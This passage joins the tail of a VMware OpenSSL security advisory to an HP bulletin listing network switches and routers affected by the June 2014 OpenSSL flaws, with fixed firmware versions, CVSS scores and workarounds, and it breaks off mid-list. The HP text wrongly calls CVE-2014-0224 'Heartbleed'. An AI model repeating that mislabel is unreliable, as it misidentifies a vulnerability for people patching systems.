vCD 5.1.3 patch pending vCD 5.5.1.1 patch pending vCenter Site Recovery Manager 5.0.3.1 patch pendingTable 3 ======= The following table lists all affected clients running a vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating over an untrusted network.
VMware Product Running Replace with/ Product Version on Apply Patch ============== ======= ======= ============= vCenter Server 5.5 any patch pending vCenter Server 5.1 any patch pending vCenter Server 5.0 any patch pending
Update Manager 5.5 Windows patch pending Update Manager 5.1 Windows patch pending Update Manager 5.0 Windows patch pending
Config Manager (VCM) 5.6 patch pending
Horizon View Client 5.3.1 patch pending Horizon View Client 4.x patch pending Horizon Workspace 1.8.1 patch pending Horizon Workspace 1.5 patch pending
ITBM Standard 1.0.1 patch pending ITBM Standard 1.0 patch pending
Studio 2.6.0.0 patch pending
Usage Meter 3.3 patch pending vCenter Chargeback Manager 2.6 patch pending vCenter Converter Standalone 5.5 patch pending vCenter Converter Standalone 5.1 patch pending vCD (VCHS) 5.6.2 patch pending
vCenter Site Recovery Manager 5.5.1 patch pending vCenter Site Recovery Manager 5.1.1 patch pending
vFabric Application Director 5.2.0 patch pending vFabric Application Director 5.0.0 patch pending View Client 5.3.1 patch pending View Client 4.x patch pending VIX API 5.5 patch pending VIX API 1.12 patch pending
vMA (Management Assistant) 5.1.0.1 patch pending
VMware Data Recovery 2.0.3 patch pending
VMware vSphere CLI 5.5 patch pending
vSphere Replication 5.5.1 patch pending vSphere Replication 5.6 patch pending vSphere SDK for Perl 5.5 patch pending vSphere Storage Appliance 5.5.1 patch pending vSphere Storage Appliance 5.1.3 patch pending vSphere Support Assistant 5.5.1 patch pending vSphere Support Assistant 5.5.0 patch pending vSphere Virtual Disk 5.5 patch pending Development Kit
vSphere Virtual Disk 5.1 patch pending Development Kit vSphere Virtual Disk 5.0 patch pending Development Kit -
Solution
ESXi 5.5
Download: https://www.vmware.com/patchmgr/download.portal
Release Notes and Remediation Instructions: http://kb.vmware.com/kb/2077359
- References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
https://www.openssl.org/news/secadv_20140605.txt
- Change Log
2014-06-10 VMSA-2014-0006 Initial security advisory in conjunction with the release of ESXi 5.5 updates on 2014-06-10
- Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories http://www.vmware.com/security/advisories
VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html
Twitter https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04347622
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04347622 Version: 2
HPSBHF03052 rev.2 - HP Network Products running OpenSSL, Multiple Remote Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-06-20 Last Updated: 2014-11-20
Potential Security Impact: Remote Denial of Service (DoS), code execution, unauthorized access, modification of information, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Network Products running OpenSSL. The vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, allow unauthorized access, modify or disclose information.
References:
CVE-2010-5298 (SSRT101561) Remote Denial of Service (DoS) or Modification of Information CVE-2014-0198 (SSRT101561) Remote Unauthorized Access CVE-2014-0224 (SSRT101593) Remote Unauthorized Access or Disclosure of Information
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION section below for a list of impacted products.
NOTE:
All products listed are impacted by CVE-2014-0224. This is the vulnerability known as "Heartbleed". HP Intelligent Management Center (iMC) is also impacted by CVE-2014-0198 and CVE-2010-5298.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION On June 5th 2014, OpenSSL.org issued an advisory with several CVE vulnerabilities. HP Networking is working to release fixes for these vulnerabilities that impact the products in the table below. As fixed software is made available, this security bulletin will be updated to show the fixed versions. Until the software fixes are available, HP Networking is providing the following information including possible workarounds to mitigate the risks of these vulnerabilities.
Workarounds
HP Networking equipment is typically deployed inside firewalls and access
to management interfaces and other protocols is more tightly controlled than in public environments.
Following the guidelines in the Hardening Comware-based devices can help
to further reduce man-in-the-middle opportunities:
http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=
c03536920
For an HP Networking device acting as an OpenSSL Server, using a patched
OpenSSL client or non-OpenSSL client eliminates the risk.
Protocol Notes
The following details the protocols that use OpenSSL in Comware v5 and
Comware v7:
- Comware V7:
Server:
FIPS/HTTPS/Load Balancing/Session Initiation Protocol
Client:
Load Balancing/OpenFlow/Session Initiation Protocol/State Machine
Based Anti-Spoofing/Dynamic DNS
- Comware V5:
Server:
CAPWAP/EAP/SSLVPN
Client:
Dynamic DNS
Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted
12900 Switch Series 12900_7.10.R1109 12900_7.10.R1005P07 JG619A HP FF 12910 Switch AC Chassis JG621A HP FF 12910 Main Processing Unit JG632A HP FF 12916 Switch AC Chassis JG634A HP FF 12916 Main Processing Unit
12500.0 12500_5.20.R1828P04 12500_5.20.R1828P04-US JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M)
12500 (Comware v7) 12500_7.10.R7328P03 JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JG497A HP 12500 MPU w/Comware V7 OS JG782A HP FF 12508E AC Switch Chassis JG783A HP FF 12508E DC Switch Chassis JG784A HP FF 12518E AC Switch Chassis JG785A HP FF 12518E DC Switch Chassis JG802A HP FF 12500E MPU H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M)
11900 Switch Series 11900_7.10.R2111P04 JG608A HP FF 11908-V Switch Chassis JG609A HP FF 11900 Main Processing Unit
10500 Switch Series (Comware v5) 10500_5.20.R1208P09 10500_5.20.R1208P09-US JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC614A HP 10500 Main Processing Unit JC748A HP 10512 Switch Chassis JG375A HP 10500 TAA Main Processing Unit JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis
10500 Switch Series (Comware v7) 10500_7.10.R2111P04 JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC748A HP 10512 Switch Chassis JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis JG496A HP 10500 Type A MPU w/Comware v7 OS
9500E S9500E_5.20.R1828P04 JC124A HP A9508 Switch Chassis JC124B HP 9505 Switch Chassis JC125A HP A9512 Switch Chassis JC125B HP 9512 Switch Chassis JC474A HP A9508-V Switch Chassis JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9512E Routing-Switch Chassis (0235A0G7) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9505E Chassis w/ Fans (0235A38P) H3C S9512E Chassis w/ Fans (0235A38R)
7900.0 7900_7.10.R2118 JG682A HP FlexFabric 7904 Switch Chassis
7500 Switch Series 7500_5.20.R6708P09 7500_5.20.R6708P09-US JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T JC697A HP A7502 TAA Main Processing Unit JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE JC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE JC700A HP A7500 384 Gbps TAA Fabric / MPU JC701A HP A7510 768 Gbps TAA Fabric / MPU JD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports JD194A HP 384 Gbps Fabric A7500 Module JD194B HP 7500 384Gbps Fabric Module JD195A HP 7500 384Gbps Advanced Fabric Module JD196A HP 7502 Fabric Module JD220A HP 7500 768Gbps Fabric Module JD238A HP A7510 Switch Chassis JD238B HP 7510 Switch Chassis JD239A HP A7506 Switch Chassis JD239B HP 7506 Switch Chassis JD240A HP A7503 Switch Chassis JD240B HP 7503 Switch Chassis JD241A HP A7506 Vertical Switch Chassis JD241B HP 7506-V Switch Chassis JD242A HP A7502 Switch Chassis JD242B HP 7502 Switch Chassis JD243A HP A7503 Switch Chassis w/1 Fabric Slot JD243B HP 7503-S Switch Chassis w/1 Fabric Slot H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4) H3C S7503E Ethernet Switch Chassis with Fan (0235A0G2) H3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5) H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1) H3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3) H3C S7510E Ethernet Switch Chassis with Fan (0235A0G0) H3C S7502E Chassis w/ fans (0235A29A) H3C S7503E Chassis w/ fans (0235A27R) H3C S7503E-S Chassis w/ fans (0235A33R) H3C S7506E Chassis w/ fans (0235A27Q) H3C S7506E-V Chassis w/ fans (0235A27S)
HSR6800 HSR6800_5.20.R3303P10 HSR6800_5.20.R3303P10-US JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU
HSR6800 Russian Version HSR6800_5.20.R3303P10.RU JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU
HSR6602 HSR6602_5.20.R3303P10 HSR6602_5.20.R3303P10-US JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router
HSR6602 Russian Version HSR6602_5.20.R3303P10.RU JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router
6602.0 6602_5.20.R3303P10 6602_5.20.R3303P10-US JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D)
6602 Russian Version 6602_5.20.R3303P10.RU JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D)
A6600 6600.RPE_5.20.R3303P10 6600.RSE_5.20.R3303P10 6600.RPE_5.20.R3303P10-US 6600.RSE_5.20.R3303P10-US JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
A6600 Russian Version 6600.RPE_5.20.R3303P10.RU 6600.RSE_5.20.R3303P10.RU JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
6600 MCP HSR6602_5.20.R3303P10 HSR6602_5.20.R3303P10-US JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
6600 MCP Russian Version HSR6602_5.20.R3303P10.RU JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
5920 Switch Series 5900AF-5920AF_7.10.R2311P01 5900AF-5920AF_7.10.R2311P01-US JG296A HP 5920AF-24XG Switch JG555A HP 5920AF-24XG TAA Switch
5900 Switch Series 5900AF-5920AF_7.10.R2311P01 5900AF-5920AF_7.10.R2311P01-US JC772A HP 5900AF-48XG-4QSFP+ Switch JG336A HP 5900AF-48XGT-4QSFP+ Switch JG510A HP 5900AF-48G-4XG-2QSFP+ Switch JG554A HP 5900AF-48XG-4QSFP+ TAA Switch JG838A HP FF 5900CP-48XG-4QSFP+ Switch
5830 Switch Series 5830_5.20.R1118P09 5830_5.20.R1118P09-US JC691A HP A5830AF-48G Switch w/1 Interface Slot JC694A HP A5830AF-96G Switch JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot JG374A HP 5830AF-96G TAA Switch
5820 Switch Series 5800-5820X_5.20.R1808P25 5800-5820X_5.20.R1808P27-US JC102A HP 5820-24XG-SFP+ Switch JC106A HP 5820-14XG-SFP+ Switch with 2 Slots JG219A HP 5820AF-24XG Switch JG243A HP 5820-24XG-SFP+ TAA-compliant Switch JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media modules Plus OSM (0235A37L) H3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T (RJ45) (0235A370)
5800 Switch Series 5800-5820X_5.20.R1808P25 5800-5820X_5.20.R1808P27-US JC099A HP 5800-24G-PoE Switch JC100A HP 5800-24G Switch JC101A HP 5800-48G Switch with 2 Slots JC103A HP 5800-24G-SFP Switch JC104A HP 5800-48G-PoE Switch JC105A HP 5800-48G Switch JG225A HP 5800AF-48G Switch JG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots JG254A HP 5800-24G-PoE+ TAA-compliant Switch JG255A HP 5800-24G TAA-compliant Switch JG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot JG258A HP 5800-48G TAA Switch w 1 Intf Slot H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot (0235A36U) H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S) H3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module (no power) (0235A374) H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus ) Plus media module (0235A379) H3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378) H3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM (0235A36W)
5500 HI Switch Series 5500.HI_5.20.R5501P02 5500.HI_5.20.R5501P02-US JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch JG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt JG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt JG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt JG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt JG681A HP 5500-24G-SFP HI TAA Swch w/2Slt
5500 EI Switch Series 5500.EI-4800G_5.20.R2221P05 5500.EI-4800G_5.20.R2221P04-US JD373A HP 5500-24G DC EI Switch JD374A HP 5500-24G-SFP EI Switch JD375A HP 5500-48G EI Switch JD376A HP 5500-48G-PoE EI Switch JD377A HP 5500-24G EI Switch JD378A HP 5500-24G-PoE EI Switch JD379A HP 5500-24G-SFP DC EI Switch JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts JG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts JG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts JG251A HP 5500-48G EI TAA Switch w 2 Intf Slts JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts JG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts H3C S5500-28C-EI Ethernet Switch (0235A253) H3C S5500-28F-EI Eth Switch AC Single (0235A24U) H3C S5500-52C-EI Ethernet Switch (0235A24X) H3C S5500-28C-EI-DC Ethernet Switch (0235A24S) H3C S5500-28C-PWR-EI Ethernet Switch (0235A255) H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259) H3C S5500-52C-PWR-EI Ethernet Switch (0235A251)
5500 SI Switch Series 5500.SI_5.20.R2221P04 JD369A HP 5500-24G SI Switch JD370A HP 5500-48G SI Switch JD371A HP 5500-24G-PoE SI Switch JD372A HP 5500-48G-PoE SI Switch JG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts JG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts H3C S5500-28C-SI Ethernet Switch (0235A04U) H3C S5500-52C-SI Ethernet Switch (0235A04V) H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H) H3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)
5120 EI Switch Series 5120.EI-4210G-4510G_5.20.R2221P04 5120.EI-4210G-4510G_5.20.R2221P04-US JE066A HP 5120-24G EI Switch JE067A HP 5120-48G EI Switch JE068A HP 5120-24G EI Switch with 2 Slots JE069A HP 5120-48G EI Switch with 2 Slots JE070A HP 5120-24G-PoE EI Switch with 2 Slots JE071A HP 5120-48G-PoE EI Switch with 2 Slots JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts JG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts JG245A HP 5120-24G EI TAA Switch w 2 Intf Slts JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts JG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts JG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ) H3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS) H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR) H3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT) H3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU) H3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)
5120 SI switch Series 5120.SI_5.20.R1513P86 JE072A HP 5120-48G SI Switch JE073A HP 5120-16G SI Switch JE074A HP 5120-24G SI Switch JG091A HP 5120-24G-PoE+ (370W) SI Switch JG092A HP 5120-24G-PoE+ (170W) SI Switch H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W) H3C S5120-20P-SI L2 16GE Plus 4SFP (0235A42B) H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D) H3C S5120-28P-HPWR-SI (0235A0E5) H3C S5120-28P-PWR-SI (0235A0E3)
4800 G Switch Series 5500.EI-4800G_5.20.R2221P05 5500.EI-4800G_5.20.R2221P04-US JD007A HP 4800-24G Switch JD008A HP 4800-24G-PoE Switch JD009A HP 4800-24G-SFP Switch JD010A HP 4800-48G Switch JD011A HP 4800-48G-PoE Switch
3Com Switch 4800G 24-Port (3CRS48G-24-91) 3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91) 3Com Switch 4800G 48-Port (3CRS48G-48-91) 3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91) 3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)
4510G Switch Series 5500.EI-4800G_5.20.R2221P05 5500.EI-4800G_5.20.R2221P04-US JF428A HP 4510-48G Switch JF847A HP 4510-24G Switch
3Com Switch 4510G 48 Port (3CRS45G-48-91) 3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91) 3Com Switch E4510-24G (3CRS45G-24-91)
4210G Switch Series 5120.EI-4210G-4510G_5.20.R2221P04 5120.EI-4210G-4510G_5.20.R2221P04-US JF844A HP 4210-24G Switch JF845A HP 4210-48G Switch JF846A HP 4210-24G-PoE Switch
3Com Switch 4210-24G (3CRS42G-24-91) 3Com Switch 4210-48G (3CRS42G-48-91) 3Com Switch E4210-24G-PoE (3CRS42G-24P-91)
3610 Switch Series S3610-5510_5.20.R5319P08 JD335A HP 3610-48 Switch JD336A HP 3610-24-4G-SFP Switch JD337A HP 3610-24-2G-2G-SFP Switch JD338A HP 3610-24-SFP Switch H3C S3610-52P - model LS-3610-52P-OVS (0235A22C) H3C S3610-28P - model LS-3610-28P-OVS (0235A22D) H3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E) H3C S3610-28F - model LS-3610-28F-OVS (0235A22F)
3600 V2 Switch Series 3600V2_5.20.R2109P05 JG299A HP 3600-24 v2 EI Switch JG300A HP 3600-48 v2 EI Switch JG301A HP 3600-24-PoE+ v2 EI Switch JG301B HP 3600-24-PoE+ v2 EI Switch JG302A HP 3600-48-PoE+ v2 EI Switch JG302B HP 3600-48-PoE+ v2 EI Switch JG303A HP 3600-24-SFP v2 EI Switch JG304A HP 3600-24 v2 SI Switch JG305A HP 3600-48 v2 SI Switch JG306A HP 3600-24-PoE+ v2 SI Switch JG306B HP 3600-24-PoE+ v2 SI Switch JG307A HP 3600-48-PoE+ v2 SI Switch JG307B HP 3600-48-PoE+ v2 SI Switch
3100V2 3100V2_5.20.R5203P07 JD313B HP 3100-24-PoE v2 EI Switch JD318B HP 3100-8 v2 EI Switch JD319B HP 3100-16 v2 EI Switch JD320B HP 3100-24 v2 EI Switch JG221A HP 3100-8 v2 SI Switch JG222A HP 3100-16 v2 SI Switch JG223A HP 3100-24 v2 SI Switch
3100V2-48 3100V2.48_5.20.R2109P05 JG315A HP 3100-48 v2 Switch
1920.0 1920-48G-JG927A_5.20.R1104 1920-8G-PoE-65W-JG921A_5.20.R1104 1920-8G-JG920A_5.20.R1104 1920-24G-PoE-370W-JG926A_5.20.R1104 1920-24G-PoE-180W-JG925A_5.20.R1104 1920-24G-JG924A_5.20.R1104 1920-16G-JG923A_5.20.R1104 1920-8G-PoE-180W-JG922A_5.20.R1104 JG927A HP 1920-48G Switch JG921A HP 1920-8G-PoE+ (65W) Switch JG920A HP 1920-8G Switch JG926A HP 1920-24G-PoE+ (370W) Switch JG925A HP 1920-24G-PoE+ (180W) Switch JG924A HP 1920-24G Switch JG923A HP 1920-16G Switch JG922A HP 1920-8G-PoE+ (180W) Switch
1910.0 1910-8-POE-JG537_5.20.R1106 1910-48-JG540_5.20.R1106 1910-24-JG538_5.20.R1106 1910-24-POE-JG539_5.20.R1106 1910-8-JG536_5.20.R1106 JG537A HP 1910-8 -PoE+ Switch JG540A HP 1910-48 Switch JG538A HP 1910-24 Switch JG539A HP 1910-24-PoE+ Switch JG536A HP 1910-8 Switch
1810v1 P2 Fix in progress use mitigations J9449A HP 1810-8G Switch J9450A HP 1810-24G Switch
1810v1 PK Fix in progress use mitigations J9660A HP 1810-48G Switch
MSR20 MSR20.SI_5.20.R2513P02 JD432A HP A-MSR20-21 Multi-Service Router JD662A HP MSR20-20 Multi-Service Router JD663A HP MSR20-21 Multi-Service Router JD663B HP MSR20-21 Router JD664A HP MSR20-40 Multi-Service Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326) H3C MSR 20-20 (0235A19H) H3C MSR 20-21 (0235A325) H3C MSR 20-40 (0235A19K) H3C MSR-20-21 Router (0235A19J)
MSR20-1X MSR201X_5.20.R2513P02 JD431A HP MSR20-10 Router JD667A HP MSR20-15 IW Multi-Service Router JD668A HP MSR20-13 Multi-Service Router JD669A HP MSR20-13 W Multi-Service Router JD670A HP MSR20-15 A Multi-Service Router JD671A HP MSR20-15 AW Multi-Service Router JD672A HP MSR20-15 I Multi-Service Router JD673A HP MSR20-11 Multi-Service Router JD674A HP MSR20-12 Multi-Service Router JD675A HP MSR20-12 W Multi-Service Router JD676A HP MSR20-12 T1 Multi-Service Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router JG209A HP MSR20-12-T-W Router (NA) JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) H3C MSR 20-10 (0235A0A7) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-11 (0235A31V) H3C MSR 20-12 (0235A32E) H3C MSR 20-12 T1 (0235A32B) H3C MSR 20-13 (0235A31W) H3C MSR 20-13 W (0235A31X) H3C MSR 20-15 A (0235A31Q) H3C MSR 20-15 A W (0235A31R) H3C MSR 20-15 I (0235A31N) H3C MSR 20-15 IW (0235A31P) H3C MSR20-12 W (0235A32G)
MSR30 MSR30.SI_5.20.R2513P02 JD654A HP MSR30-60 POE Multi-Service Router JD657A HP MSR30-40 Multi-Service Router JD658A HP MSR30-60 Multi-Service Router JD660A HP MSR30-20 POE Multi-Service Router JD661A HP MSR30-40 POE Multi-Service Router JD666A HP MSR30-20 Multi-Service Router JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF232A HP RT-MSR3040-AC-OVS-AS-H3 JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S) H3C MSR 30-20 (0235A19L) H3C MSR 30-20 POE (0235A239) H3C MSR 30-40 (0235A20J) H3C MSR 30-40 POE (0235A25R) H3C MSR 30-60 (0235A20K) H3C MSR 30-60 POE (0235A25S) H3C 